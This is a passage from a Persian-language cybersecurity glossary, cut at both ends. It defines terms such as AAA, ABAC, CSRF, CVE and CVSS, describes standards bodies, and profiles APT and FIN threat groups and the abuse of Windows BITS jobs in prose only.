یک کنسرسیوم بین المللی است که مشاغل آسیب‌دیده از حملات فیشینگ را با شرکت‌های امنیتی، مجریان قانون، دولت، انجمن‌های تجاری و دیگران گرد هم می‌آورد.

شبکه تبادل اطلاعات ضد ویروس

AVIEN )Anti-Virus Information Exchange Network(

گروهی از متخصصان آنتی ویروس و امنیتی که اطلاعات مربوط به شرکت‌های AV ، محصولات، بدافزارها و سایر تهدیدها را به اشتراک می‌گذارند.

ارزیابی و مجوز

A&A ()

فرایند A&A یک ارزیابی جامع و یا ارزیابی سیاست‌های سیستم اطلاعات، اجزای امنیتی فنی و غیر فنی، اسناد، ضمانت‌های تکمیلی، خط مشی‌ها و آسیب‌پذیری‌ها است.

احراز هویت، مجوز و حسابداری

AAA(Authentication, Authorization, and Accounting)

احراز هویت، مجوز و حسابداری اصطلاحی است برای چارچوب کنترل هوشمند دسترسی به منابع رایانه، اعمال سیاست‌ها، حسابرسی استفاده و ارائه اطلاعات لازم برای صورتحساب خدمات. این فرایندهای ترکیبی برای مدیریت و امنیت موثر شبکه مهم تلقی می‌شوند.

داده‌های احراز هویت اضافی

AAD (Additional Authentication Data)

هر رشته‌ای که به عنوان بخشی از درخواست رمزگذاری یا رمزگشایی به سرویس مدیریت کلید Cloud منتقل می‌شود. AAD به عنوان یک بررسی یکپارچگی مورد استفاده قرار می‌گیرد و می‌تواند از داده‌ها در برابر حملات اشتباه محافظت کند.

ویژگی اقتدار

AA(Attribute Authority(

ویژگی اقتدار (که به عنوان فروشگاه ویژگی نیز شناخته می‌شود) یک فهرست یا پایگاه داده است که سیستم‌ها می‌توانند به طور ایمن ویژگی‌ها را اضافه، اصلاح و ذخیره کنند.

سطح اطمینان از احراز هویت

AAL)Authenticator Assurance Level(

سطوح اطمینان از احراز هویت به منظور ایجاد اطمینان در تأیید اعتبار ارائه شده توسط ارائه دهنده هویت به یک طرف متکی در سطح اطمینان دلخواه است و سطوح اطمینان از احراز هویت یک عامل در ارزیابی ریسک است.

خدمات احراز هویت و مجوز

AAS)Authentication and Authorization Service(

احراز هویت تأیید می‌کند که کاربران همانطور که می‌گویند هستند. مجوز به آن کاربران اجازه دسترسی به یک منبع را می‌دهد. در حالی که احراز هویت و مجوز ممکن است شبیه به نظر برسند، اما فرآیندهای امنیتی متمایزی در دنیای هویت و مدیریت دسترسی هستند.

ویژگی مبتنی بر کنترل دسترسی

ABAC)Attribute Based Access Control(

ویژگی مبتنی بر کنترل دسترسی که به عنوان کنترل دسترسی مبتنی بر خط مشی نیز شناخته می‌شود، یک الگوی کنترل دسترسی را تعریف می‌کند که به موجب آن حقوق دسترسی با استفاده از خط مشی‌هایی که ویژگی‌ها را با هم ترکیب می‌کند، به کاربران اعطا می‌شود. خط مشی‌ها می‌توانند از هر نوع ویژگی (ویژگی‌های کاربر، ویژگی‌های منبع، شی، ویژگی‌های محیط و غیره) استفاده کنند.

کنترل دسترسی

AC(Access Control)

کنترل دسترسی یک تکنیک امنیتی است که تعیین می‌کند چه کسی یا چه چیزی می‌تواند منابع را در محیط محاسبات مشاهده یا استفاده کند. این یک مفهوم اساسی در امنیت است که خطر را برای تجارت یا سازمان به حداقل می‌رساند. دو نوع کنترل دسترسی وجود دارد: فیزیکی و منطقی. کنترل دسترسی فیزیکی دسترسی به پردیس‌ها، ساختمان‌ها، اتاق‌ها و دارایی‌های فیزیکی فناوری اطلاعات را محدود می‌کند. کنترل دسترسی منطقی اتصال به شبکه‌های کامپیوتری‌، فایل‌های سیستم و داده‌ها را محدود می‌کند.

مرکز کنترل مدیریت

ACC)Administration Control Center(

مرکز کنترل مدیریت طوری طراحی شده است که به مدیر سیستم کاربر نهایی شما امکان مدیریت استفاده از نرم‌افزار مجاز شما توسط اعضای سازمان را بدهد. مدیر مجبور نیست برای مدیریت مجوزهای نرم افزار در سایت کاربر نهایی شما حضور فیزیکی داشته باشد.

اجرای کد دلخواه

ACE) Arbitrary Code Execution(

در امنیت رایانه، اجرای کد دلخواه ( ACE) توانایی مهاجم برای اجرای هرگونه دستور یا کد دلخواه مهاجم بر روی ماشین هدف یا در یک فرآیند هدف است. آسیب‌پذیری اجرای کد دلخواه یک نقص امنیتی در نرم افزار یا سخت‌افزار است که اجازه اجرای دلخواه کد را می‌دهد.

تکنیک فرار پیشرفته

AET(Advanced Evasion Technique)

نوعی حمله شبکه است که چندین روش فرار مختلف شناخته شده را ترکیب می‌کند تا یک تکنیک جدید ایجاد کند که به طور همزمان در چندین لایه از شبکه ارائه می‌شود. کد موجود در AET لزوماً مخرب نیست. خطر این است که دسترسی غیرقابل تشخیص به مهاجم را برای شبکه فراهم می‌کند.

یک گروه مشکوک جاسوسی آمریکای جنوبی

APT-C-36

APT-C-36یک گروه مشکوک جاسوسی آمریکای جنوبی است که حداقل از سال 2018 فعال بوده است. این گروه عمدتاً مؤسسات دولتی کلمبیا و همچنین شرکت های مهم در بخش مالی، صنعت نفت و تولید حرفه ای را هدف قرار می دهد.

یک گروه تهدید چینی

APT1

APT1 یک گروه تهدید چینی است که به دپارتمان سوم اداره ستاد کل ارتش آزادیبخش خلق ( PLA) منسوب است، که معمولاً توسط واحد نظامی Cover Designator (MUCD) به عنوان واحد 61398 شناخته می شود.

یک گروه تهدید

APT12

APT12یک گروه تهدید است که به چین نسبت داده شده است. این گروه قربانیان مختلفی از جمله اما نه محدود به رسانه ها، شرکت های فناوری پیشرفته و چندین دولت را هدف قرار داده است.

یک گروه تهدید مستقر در چین است

APT16

APT16یک گروه تهدید مستقر در چین است که کمپین های spearphishing را با هدف قرار دادن سازمان‌های ژاپنی و تایوانی راه اندازی کرده است.

یک گروه تهدید مستقر در چین است

APT17

APT17یک گروه تهدید مستقر در چین است که نفوذهای شبکه ای را علیه نهادهای دولتی ایالات متحده، صنایع دفاعی، شرکت های حقوقی، شرکت های فناوری اطلاعات، شرکت های معدنی و سازمان های غیردولتی انجام داده است.

یک گروه تهدید

APT18

APT18یک گروه تهدید است که حداقل از سال 2009 فعالیت می کند و طیف وسیعی از صنایع از جمله فناوری، تولید، گروه های حقوق بشر، دولت و پزشکی را هدف قرار داده است.

یک گروه تهدید مستقر در چین است

APT19

APT19یک گروه تهدید مستقر در چین است که صنایع مختلفی از جمله دفاع، مالی، انرژی، داروسازی، مخابرات، فناوری پیشرفته، آموزش، تولید و خدمات حقوقی را هدف قرار داده است. در سال 2017، یک کمپین فیشینگ برای هدف قرار دادن هفت شرکت حقوقی و سرمایه گذاری مورد استفاده قرار گرفت. برخی از تحلیلگران APT19و Deep Panda را به عنوان یک گروه دنبال می کنند، اما اطلاعات منبع باز مشخص نیست که آیا گروه‌ها یکسان هستند یا خیر.

یک گروه تهدید

APT28

APT28یک گروه تهدید است که به واحد نظامی 26165 اداره اطلاعات اصلی ستاد کل روسی و مرکز خدمات ویژه اصلی نسبت داده شده است. این گروه حداقل از سال 2004 فعال بوده است. گزارش شده است که APT28در تلاش برای مداخله در انتخابات ریاست جمهوری ایالات متحده، کمپین هیلاری کلینتون، کمیته ملی دموکرات و کمیته مبارزات انتخاباتی دموکرات کنگره را در سال 2016 به خطر انداخت. در سال 2018، ایالات متحده پنج افسر GRU واحد 26165 مرتبط با APT28را به دلیل عملیات سایبری (از جمله عملیات دسترسی نزدیک) که بین سال‌های 2014 و 2018 علیه آژانس جهانی ضد دوپینگ ( WADA)، آژانس ضد دوپینگ ایالات متحده انجام شد، متهم کرد. تاسیسات هسته ای ایالات متحده، سازمان منع سلاح های شیمیایی ( OPCW) ، آزمایشگاه مواد شیمیایی Spiez سوئیس، و سازمان های دیگر. برخی از این ها با کمک واحد 74455 GRU انجام شد که به آن تیم کرم شنی نیز گفته می شود.

یک گروه تهدید است

APT29

APT29یک گروه تهدید است که به سرویس اطلاعات خارجی روسیه (SVR ) نسبت داده شده است. آنها حداقل از سال 2008 فعالیت می کنند و اغلب شبکه های دولتی در اروپا و کشورهای عضو ناتو، مؤسسات تحقیقاتی و اتاق های فکر را هدف قرار می دهند. گزارش شده است که APT29از تابستان 2015 کمیته ملی دموکرات را به خطر انداخت. در آوریل 2021، دولت‌های ایالات متحده و بریتانیا عملیات سایبری به خطر افتادن زنجیره تامین SolarWinds را به SVR نسبت دادند. بیانیه های عمومی شامل استناد به APT29، Cozy Bear، و The Dukes بود. قربانیان این کمپین شامل دولت، مشاوره، فناوری، مخابرات و سازمان های دیگر در آمریکای شمالی، اروپا، آسیا و خاورمیانه بودند. گزارش‌های صنعتی به بازیگران درگیر در این کمپین به‌عنوان UNC2452، NOBELIUM، StellarParticle و Dark Halo اشاره می‌کنند.

یک گروه تهدید مستقر در چین

APT3

APT3 یک گروه تهدید مستقر در چین است که محققان آن را به وزارت امنیت دولتی چین نسبت داده‌اند. این گروه مسئول کمپین هایی است که به عنوان عملیات روباه مخفی، عملیات گرگ مخفی، و عملیات Double Tap شناخته می شوند. از ژوئن 2015، به نظر می رسد این گروه از هدف قرار دادن قربانیان عمدتاً ایالات متحده به سازمان های عمدتاً سیاسی در هنگ کنگ تغییر مکان داده است.در سال 2017، MITER یک طرح شبیه سازی دشمن APT3را توسعه داد.

گروه تهدید که مشکوک به ارتباط با دولت چین است.

APT30

APT30 یک گروه تهدید است که مشکوک به ارتباط با دولت چین است. در حالی که Naikon برخی از ویژگی‌های مشترک را با APT30دارد، به نظر نمی‌رسد این دو گروه دقیقاً مطابقت داشته باشند.

یک گروه تهدید کننده مشکوک مستقر در ویتنام

APT32

APT32یک گروه تهدید کننده مشکوک مستقر در ویتنام است که حداقل از سال 2014 فعال بوده است. این گروه چندین صنعت بخش خصوصی و همچنین دولت های خارجی، مخالفان و روزنامه نگاران را با تمرکز شدید بر کشورهای آسیای جنوب شرقی مانند ویتنام، فیلیپین، هدف قرار داده است. لائوس و کامبوج آنها به طور گسترده از مصالحه های استراتژیک وب برای به خطر انداختن قربانیان استفاده کرده اند.

گروه تهدیدکننده مشکوک ایرانی

APT33

APT33یک گروه تهدیدکننده مشکوک ایرانی است که حداقل از سال 2013 عملیاتی را انجام داده است. این گروه سازمان‌هایی را در چندین صنعت در ایالات متحده، عربستان سعودی و کره جنوبی هدف قرار داده است که علاقه خاصی به بخش‌های هوانوردی و انرژی دارند.

گروه جاسوسی سایبری تحت حمایت دولت کره شمالی

APT37

یک گروه جاسوسی سایبری تحت حمایت دولت کره شمالی است که حداقل از سال 2012 فعال بوده است. این گروه عمدتاً قربانیان را در کره جنوبی، اما همچنین در ژاپن، ویتنام، روسیه، نپال، چین، هند، رومانی، کویت و نیز هدف قرار داده است. سایر مناطق خاورمیانه APT37همچنین بین سال‌های 2016-2018 به کمپین‌های زیر مرتبط شده است: عملیات سپیده‌دم، عملیات Erebus، زمان طلایی، سال نو شیطانی، آیا شاد هستید؟، فری میلک، حقوق بشر کره شمالی، و سال نو شیطانی 2018.تعاریف گروه کره شمالی دارای همپوشانی قابل توجهی هستند و برخی از محققان امنیتی همه فعالیت های سایبری تحت حمایت دولت کره شمالی را تحت نام گروه لازاروس به جای ردیابی خوشه ها یا زیر گروه ها گزارش می دهند.

گروه تهدید تحت حمایت دولت کره شمالی

APT38

APT38یک گروه تهدید تحت حمایت دولت کره شمالی است که در عملیات سایبری مالی تخصص دارد. آن را به اداره کل شناسایی نسبت داده اند. APT38حداقل از سال 2014 فعال است، بانک‌ها، مؤسسات مالی، کازینوها، صرافی‌های ارزهای دیجیتال، نقاط پایانی سیستم SWIFT و دستگاه‌های خودپرداز را در حداقل 38 کشور در سراسر جهان هدف قرار داده است. عملیات مهم شامل دزدی بانک بنگلادش در سال 2016، که طی آن APT38 81 میلیون دلار سرقت کرد، و همچنین حملات علیه Bancomext (2018) و Banco de Chile برخی از حملات آنها مخرب بوده است. تعاریف گروه کره شمالی دارای همپوشانی قابل توجهی هستند و برخی از محققان امنیتی همه فعالیت های سایبری تحت حمایت دولت کره شمالی را تحت نام گروه لازاروس به جای ردیابی خوشه ها یا زیر گروه ها گزارش می دهند.

یکی از چندین نام برای فعالیت های جاسوسی سایبری است

APT39

APT39یکی از چندین نام برای فعالیت های جاسوسی سایبری است که حداقل از سال 2014 توسط وزارت اطلاعات و امنیت ایران ( MOIS) از طریق شرکت پیشرو Rana Intelligence Computing انجام می شود. در سراسر آسیا، آفریقا، اروپا و آمریکای شمالی برای ردیابی افراد و نهادهایی که توسط MOIS یک تهدید محسوب می‌شوند.

یک گروه تهدید است

APT41

یک گروه تهدید است که محققان آن را به عنوان گروه جاسوسی تحت حمایت دولت چین ارزیابی کرده‌اند که عملیات‌هایی با انگیزه مالی نیز انجام می‌دهد. APT41 که حداقل از سال 2012 فعال است، مشاهده شده است که مراقبت های بهداشتی، مخابرات، فناوری و صنایع بازی های ویدیویی را در 14 کشور هدف قرار داده است. APT41 حداقل تا حدی با گزارش های عمومی در مورد گروه هایی از جمله BARIUM و Winnti Group همپوشانی دارد.

مشاغل BITS

BITS ( Background Intelligent Transfer Service) Jobs

ممکن است دشمنان از کارهای BITS برای اجرا یا پاکسازی مداوم پس از بارهای مخرب سوء استفاده کنند. سرویس انتقال هوشمند پس‌زمینه ویندوز (BITS) یک مکانیسم انتقال فایل با پهنای باند کم و ناهمزمان است که از طریق Component Object Model (COM) در معرض دید قرار می‌گیرد. BITS معمولاً توسط به‌روزرسانی‌ها، پیام‌رسان‌ها و سایر برنامه‌های کاربردی استفاده می‌شود که ترجیح می‌دهند در پس‌زمینه (با استفاده از پهنای باند غیرفعال موجود) بدون ایجاد وقفه در سایر برنامه‌های شبکه کار کنند. وظایف انتقال فایل به صورت کارهای BITS اجرا می شوند که حاوی صفی از یک یا چند عملیات فایل هستند. رابط برای ایجاد و مدیریت مشاغل BITS از طریق PowerShell و ابزار BITSadmin قابل دسترسی است. ممکن است دشمنان پس از اجرای کدهای مخرب از BITS برای دانلود، اجرا و حتی پاکسازی سوء استفاده کنند. وظایف BITS در پایگاه داده شغلی BITS، بدون فایل‌های جدید یا تغییرات رجیستری وجود دارند و اغلب توسط فایروال‌های میزبان مجاز هستند. اجرای فعال شده BITS همچنین ممکن است با ایجاد مشاغل طولانی مدت (حداکثر طول عمر پیش فرض 90 روز و قابل تمدید است) یا فراخوانی یک برنامه دلخواه هنگام تکمیل کار یا خطا (از جمله پس از راه اندازی مجدد سیستم) تداوم را فعال کند.عملکردهای آپلود BITS را نیز می توان برای انجام Exfiltration Over Alternative Protocol استفاده کرد.

جعل درخواست بین سایت

CSRF )Cross-Site Request Forgery(

حمله‌ای است که کاربران احراز هویت را مجبور می‌کند تا درخواست خود را به یک برنامه وب ارسال کنند که در حال حاضر در برابر آن احراز هویت شده است. حملات CSRF از اعتمادی که یک برنامه وب به یک کاربر معتبر دارد سوء استفاده می‌کند. اگر CSRF نتواند بین درخواست ایجاد شده توسط یک کاربر و درخواست ایجاد شده توسط کاربر بدون رضایت آنها تمایز قائل شود، حمله CSRF از آن استفاده می‌کند. هدف مهاجم از انجام حمله CSRF این است که کاربر را مجبور به ارائه درخواست تغییر وضعیت کند.

شمارش و طبقه‌بندی الگوی حمله مشترک

CAPEC( Common Attack Pattern Enumeration and Classification)

یک فرهنگ لغت جامع و طبقه‌بندی حملات شناخته شده است که فهرست عمومی الگوهای حملات رایج را در اختیار عموم قرار می‌دهد که به کاربران کمک می‌کند بفهمند چگونه دشمنان از نقاط ضعف برنامه‌ها و سایر قابلیت‌های مجهز به سایبر استفاده می‌کنند.

فرآیند پذیرش آسیب پذیری مشترک متا دیتا

CVMAP( Collaborative Vulnerability Metadata Acceptance Process)

NVDمسئول ارائه ابرداده‌های مختلف به رکوردهای CVE پس از انتشار آنها در فهرست CVE بوده است. انواع داده هایی که در حال حاضر توسط کارکنان NVD ارائه می شود عبارتند از: سیستم امتیازدهی آسیب پذیری رایج نسخه 3.1 (CVSS نسخه 3.1) سیستم امتیازدهی آسیب پذیری رایج نسخه 2.0 (CVSS نسخه 2.0) شمارش نقاط ضعف مشترک (CWE) پیکربندی های سرشماری پلت فرم مشترک ( CPE) برچسب های مرجع این نوع داده ها به عنوان دسته های ارسال در CVMAP نامیده می شوند. همانطور که برنامه CVE در طول زمان بالغ و تکامل یافته است، حجم فزاینده ای از انتشارات CVE نشان داده است که سیستم های نگهداری جدیدی برای ارائه به موقع این نقاط داده و در عین حال حفظ ثبات و کیفیت مورد نیاز است. برای پشتیبانی از این نیاز، NVD برنامه جدیدی را برای ارسال ابرداده های CVE از مقامات شماره گذاری CVE (CNA) و ارائه دهندگان مجاز داده ( ADP) با نام " CVMAP " آغاز کرده است. بر اساس داده‌های ارائه شده به فهرست CVE توسط CNA و ADP، NVD تمام اطلاعات ارائه‌شده را ارزیابی می‌کند و ابرداده‌های مرتبط را ارزیابی می‌کند، اگر اطلاعات ارائه‌شده با ارزیابی کارکنان NVD سازگار باشد، ارائه‌دهندگان داده‌ها می‌توانند سطح پذیرش خود را برای دسته ارسال ارائه‌شده افزایش دهند. . هنگامی که یک ارائه‌دهنده داده به سطح پذیرش ارائه‌دهنده رسید، اطلاعات آنها کمتر ممیزی می‌شوند و بلافاصله در وب‌سایت و فیدهای داده منتشر می‌شوند. این برنامه در هنگام ارائه استانداردها و اطلاعات مبتنی بر متن منجر به اقدامات منسجم‌تر در سراسر جامعه امنیت اطلاعات می‌شود، فشار ناشی از حجم فزاینده انتشارات CVE بر کارکنان NVD را کاهش می‌دهد و به حفظ ثبات داده ها و کیفیت اطلاعات برای همه مصرف‌کنندگان CVE ادامه می‌دهد.

آسیب پذیری‌ها و مشکلات رایج

CVE(Common Vulnerabilities and Exposures)

فهرستی از نقص های امنیتی کامپیوتری است که به صورت عمومی فاش شده است. وقتی شخصی به یک CVE اشاره می کند، منظورش یک نقص امنیتی است که به آن یک شماره شناسه CVE اختصاص داده شده است. توصیه های امنیتی صادر شده توسط فروشندگان و محققان تقریباً همیشه حداقل یک شناسه CVE را ذکر می‌کنند. CVE به متخصصان فناوری اطلاعات کمک می کند تا تلاش های خود را برای اولویت بندی و رفع این آسیب پذیری ها برای ایمن تر کردن سیستم های رایانه ای هماهنگ کنند.

شمارش پلت فرم مشترک

CPE (Common Platform Enumeration)

یک روش استاندارد برای توصیف و شناسایی کلاس‌های برنامه‌ها، سیستم‌های عامل و دستگاه‌های سخت‌افزاری است که در میان دارایی‌های محاسباتی یک شرکت وجود دارد.

سیستم امتیازدهی مشترک آسیب پذیری

CVSS ( Common Vulnerability Scoring System)

سیستم امتیازدهی مشترک آسیب پذیری ک چارچوب باز برای ارتباط با ویژگی ها و شدت آسیب پذیری‌های نرم‌افزار است. CVSS از سه گروه متریک تشکیل شده است: پایه، زمانی و محیطی.

مدل مدیریت تاب آوری CERT

CERT RMM (CERT Resilience Management Model)

مدل مدیریت تاب آوری CERT (CERT-RMM) پایه و اساس یک رویکرد بهبود فرآیند برای مدیریت تاب آوری عملیاتی است. این مدل شیوه‌های سازمانی ضروری را که برای مدیریت انعطاف‌پذیری عملیاتی ضروری هستند، تعریف می‌کند. شما می توانید از CERT-RMM برای تعیین توانایی سازمان خود برای مدیریت انعطاف پذیری، تعیین اهداف و توسعه برنامه هایی برای رفع شکاف های شناسایی شده استفاده کنید. با استفاده از نمای فرآیند، CERT-RMM می تواند به سازمان شما کمک کند تا با عملکرد بالغ و قابل پیش بینی به استرس پاسخ دهد.

یکپارچه سازی مدل بلوغ قابلیت

CMMI CERT (Capability Maturity Model Integration)

یکپارچه سازی مدل بلوغ قابلیت (CMMI) یک برنامه آموزشی و ارزیابی بهبود سطح فرآیند است. تحت مدیریت موسسه CMMI، یکی از شرکت های تابعه ISACA، در دانشگاه کارنگی ملون (CMU) توسعه یافته است. این مدل توسط بسیاری از قراردادهای دولت ایالات متحده، به ویژه در توسعه نرم افزار مورد نیاز است. یکپارچه سازی مدل بلوغ قابلیت به سازمان‌ها کمک می‌کند تا بهبود فرآیند را ساده کرده و رفتارهایی را تشویق کنند که خطرات را در توسعه نرم افزار، محصول و خدمات کاهش می دهد. این مدل، چارچوبی را برای توسعه محصولات و خدمات بهتر، با مجموعه‌ای از ارزیابی‌های توسعه فرآیند و خدمات، استقرار و مدیریت خدمات، و کسب محصول و خدمات، به کسب‌وکارها ارائه می‌کند.

مرکز تعالی دفاع سایبری

Ccdcoe(Cooperative Cyber Defence Centre of Excellence)

مرکز تعالی دفاع سایبری یک مرکز دفاع سایبری چند ملیتی و میان رشته ای است. ماموریت این مرکز افزایش قابلیت، همکاری و اشتراک اطلاعات بین ناتو، متحدان و شرکا در دفاع سایبری است. قلب مرکز دفاع سایبری، گروهی متنوع از کارشناسان بین المللی در امنیت سایبری است. این گروه شامل دانشمندان حقوقی، کارشناسان سیاست و استراتژی و همچنین محققان فناوری با پیشینه نظامی، دولتی و صنعتی می باشد. این مرکز توسط کشورهای عضو تا به امروز اتریش، بلژیک، جمهوری چک، استونی، فنلاند، فرانسه، آلمان، یونان، مجارستان، ایتالیا، لتونی، لیتوانی، هلند، لهستان، پرتغال، اسلواکی، اسپانیا، سوئد، پرسنل و تامین مالی می شود. ترکیه، بریتانیا و ایالات متحده آمریکا. استرالیا، بلغارستان، دانمارک، ژاپن، نروژ، رومانی، کرواسی و بسیاری دیگر نیز در مسیر پیوستن به مرکز هستند.

کنترل‌های امنیتی حیاتی

CIS Controls (Critical Security Controls)

کنترل‌های (CIS)که قبلاً به عنوان کنترل‌های امنیتی حیاتی شناخته می‌شد مجموعه‌ای از اقدامات توصیه‌شده برای دفاع سایبری هستند که راه‌های مشخص و عملی را برای توقف فراگیرترین و خطرناک‌ترین حملات امروزی ارائه می‌دهند. SANS از کنترل های CIS با آموزش، تحقیق و صدور گواهینامه پشتیبانی می کند.

20 کنترل‌های امنیتی حیاتی

Csc 20( Critical Security Controls)

Csc 20 مجموعه‌ای از 20 کنترل (که گاهی اوقات SANS Top 20 نامیده می‌شود) است که برای کمک به سازمان ها طراحی شده است تا از سیستم ها و داده های خود در برابر بردارهای حمله شناخته شده محافظت کنند. همچنین می توانند راهنمای موثری برای شرکت هایی باشند که هنوز برنامه امنیتی منسجمی ندارند.

آژانس امنیت سایبری و امنیت زیرساخت

cisa cybersecurity(Cybersecurity and Infrastructure Security Agency)

آژانس امنیت سایبری و امنیت زیرساخت یک آژانس فدرال ایالات متحده است که یک جزء عملیاتی تحت نظارت وزارت امنیت داخلی است. فعالیت های آن در ادامه ریاست حفاظت ملی و برنامه ها می باشد. آژانس امنیت سایبری و امنیت زیرساخت با شرکای خود برای دفاع در برابر تهدیدات امروزی و برای ایجاد زیرساخت ایمن‌تر و انعطاف‌پذیرتر برای آینده همکاری می‌کند.

حملات انکار سرویس

DoS)Denial-of-Service(attack

حمله (DoS) حمله‌ای است که به معنای خاموش کردن یک دستگاه یا شبکه است و باعث می‌شود آندستگاه یا شبکه برای کاربران مورد نظر خود غیرقابل دسترسی باشد. حملات DoS این کار را با غرق کردن هدف در ترافیک یا ارسال اطلاعاتی که باعث تصادف می‌شود، انجام می‌دهد. در هر دو مورد، حمله DoS کاربران مشروع (یعنی کارمندان، اعضا یا دارندگان حساب) را از خدمات یا منبعی که انتظار داشتند محروم می‌کند.

حملات انکار سرویس توزیع شده

DDoS( Distributed denial of service)

حملات انکار سرویس توزیع شده یک زیر کلاس از حملات انکار سرویس هستند. یک حمله DDoS شامل چندین دستگاه متصل آنلاین است که در مجموع به عنوان بات نت شناخته می شوند، که برای غلبه بر یک وب سایت هدف با ترافیک جعلی استفاده می شود.

مجموعه ای از ابزارها و فرآیندها

DLP(Data Loss Prevention)

یک استراتژی امنیت اطلاعات برای محافظت از داده های شرکت. DLP مجموعه ای از ابزارها و فرآیندهایی است که برای اطمینان از گم شدن، سوء استفاده یا دسترسی کاربران غیرمجاز، چه در داخل یا خارج از سازمان، داده های حساس مورد استفاده قرار می گیرد.

حمله DNS(سرور نام دامنه)

DNS attack (Domain Name Server)

DNS از نام یک وب سایت برای هدایت ترافیک به آدرس IP متعلق به خود استفاده می کند. برای مثال Amazon.com باید شما را به وب سایت آمازون ببرد. در طول این نوع حمله که پیچیده است و به روش های مختلفی ظاهر می شود، مجرمان سایبری می توانند شما را برای اهداف خود به سایت دیگری هدایت کنند. این حمله از ارتباط رفت و برگشت بین کلاینت ها و سرورها استفاده می کند.

EDR (تشخیص و پاسخ نقطه پایانی)

EDR (Endpoint Detection & Response(

راه حل های تشخیص و پاسخ نقطه پایانی برای شناسایی و پاسخ به ناهنجاری های نقطه پایانی طراحی شده اند. راه‌حل‌های EDR برای جایگزینی راه‌حل‌های IDPS یا فایروال‌ها طراحی نشده‌اند، اما عملکرد آن‌ها را با ارائه دید و تحلیل عمیق نقطه پایانی گسترش می‌دهند. EDR از مجموعه داده های مختلف استفاده می کند که همبستگی و تشخیص پیشرفته را تسهیل می کند.

یک گروه تهدید با انگیزه مالی

FIN10

FIN10یک گروه تهدید با انگیزه مالی است که حداقل از سال 2013 تا 2016 سازمان‌هایی را در آمریکای شمالی هدف قرار داده است. این گروه از داده‌های سرقت شده از قربانیان برای اخاذی از سازمان‌ها استفاده می‌کند.

یک گروه تهدید با انگیزه مالی

FIN4

FIN4یک گروه تهدید با انگیزه مالی است که حداقل از سال 2013 اطلاعات محرمانه مربوط به بازار مالی عمومی، به ویژه در مورد شرکت های مراقبت های بهداشتی و دارویی را هدف قرار داده است. FIN4 از این نظر منحصر به فرد است که قربانیان را با بدافزارهای معمولی و دائمی آلوده نمی‌کند، بلکه بر روی گرفتن اعتبارنامه‌های مجاز برای دسترسی به ایمیل و سایر مکاتبات غیر عمومی تمرکز می‌کنند.

یک گروه تهدید با انگیزه مالی

FIN5

FIN5 یک گروه تهدید با انگیزه مالی است که اطلاعات شناسایی شخصی و اطلاعات کارت پرداخت را هدف قرار داده است. این گروه حداقل از سال 2008 فعال بوده و صنعت رستوران، بازی و هتل را هدف قرار داده است. این گروه متشکل از بازیگرانی است که احتمالاً روسی صحبت می کنند.

یک گروه جرایم سایبری

FIN6

FIN6یک گروه جرایم سایبری است که داده‌های کارت پرداخت را به سرقت برده و آن‌ها را برای سود در بازارهای زیرزمینی فروخته است. این گروه به شدت سیستم‌های نقطه فروش (PoS)را در بخش مهمان‌نوازی و خرده‌فروشی مورد هدف قرار داده و به خطر انداخته است.

FIN7

FIN7یک گروه تهدید با انگیزه مالی است که از سال 2013 عمدتاً بخش‌های خرده‌فروشی، رستوران‌ها و مهمان‌نوازی ایالات متحده را هدف قرار داده و اغلب از بدافزارهای نقطه‌فروش استفاده می‌کند. بخشی از FIN7 از شرکتی به نام Combi Security تمام شد. از سال 2020، FIN7 عملیات خود را به رویکرد شکار بازی بزرگ تغییر داد، از جمله استفاده از باج‌افزار REvil و باج‌افزار خود به عنوان سرویس ، FIN7 .(RaaS)ممکن است به گروه Carbanak مرتبط باشد، اما به نظر می رسد که چندین گروه از بدافزار Carbanak استفاده می کنند و بنابراین به طور جداگانه ردیابی می شوند.

یک گروه تهدید با انگیزه مالی است

FIN8

FIN8 یک گروه تهدید با انگیزه مالی است که برای راه‌اندازی کمپین‌های spearphishing متناسب با خرده‌فروشی، رستوران‌ها و صنایع مهمان‌نوازی شناخته شده است.

FISMA (قانون فدرال مدیریت امنیت اطلاعات)

FISMA (Federal Information Security Management Act)

FISMA یک قانون ایالات متحده است که هر آژانس فدرال را ملزم به توسعه، مستندسازی و اجرای برنامه ای در سطح آژانس برای تأمین امنیت اطلاعات برای سیستم های اطلاعاتی و داده های خود می کند. این قانون اهمیت امنیت اطلاعات را برای منافع اقتصادی و امنیت ملی ایالات متحده به رسمیت شناخت.

FISSEA (انجمن مربیان امنیت سیستم های اطلاعاتی فدرال)

FISSEA)Federal Information Systems Security Educators' Association)

سازمانی که توسط و برای متخصصان امنیت سیستم های اطلاعاتی اداره می شود تا به آژانس های فدرال در انجام مسئولیت های امنیتی، آموزش و آموزش سیستم های اطلاعاتی خود کمک کنند.

شاخص جهانی امنیت سایبری

GCI (Global Cybersecurity Index)

شاخص جهانی امنیت سایبری یک مرجع قابل اعتماد است که تعهد کشورها به امنیت سایبری را در سطح جهانی برای افزایش آگاهی از اهمیت و ابعاد مختلف موضوع اندازه گیری می کند. از آنجایی که امنیت سایبری کاربرد وسیعی دارد و صنایع و بخش‌های مختلف را در بر می‌گیرد، سطح توسعه یا مشارکت هر کشور بر اساس پنج رکن ارزیابی می‌شود: (1) اقدامات قانونی، (2) اقدامات فنی، (3) اقدامات سازمانی، (4) توسعه ظرفیت، و (5) همکاری - و سپس به یک نمره کلی تجمیع می شود. GCI بر اساس رویکرد و ابتکار چند ذی‌نفع، از ظرفیت و تخصص سازمان‌ها با هدف بهبود کیفیت نظرسنجی، تقویت همکاری‌های بین‌المللی و ترویج تبادل دانش استفاده میکند. دستور کار جهانی امنیت سایبری اساس و چارچوب کلی این ابتکار را فراهم می کند.

GRC (حاکمیت، مدیریت ریسک و انطباق)

GRC (Governance, Risk Management, and Compliance )

سه بخش از یک استراتژی برای مدیریت حاکمیت کلی سازمان، مدیریت ریسک سازمانی و انطباق با مقررات. افراد، شیوه ها و ابزارهای امنیت سایبری نقش کلیدی در GRC برای بسیاری از سازمان ها دارند.

قانون قابل حمل و پاسخگویی بیمه سلامت

HIPAA (Health Insurance Portability and Accountability Act)

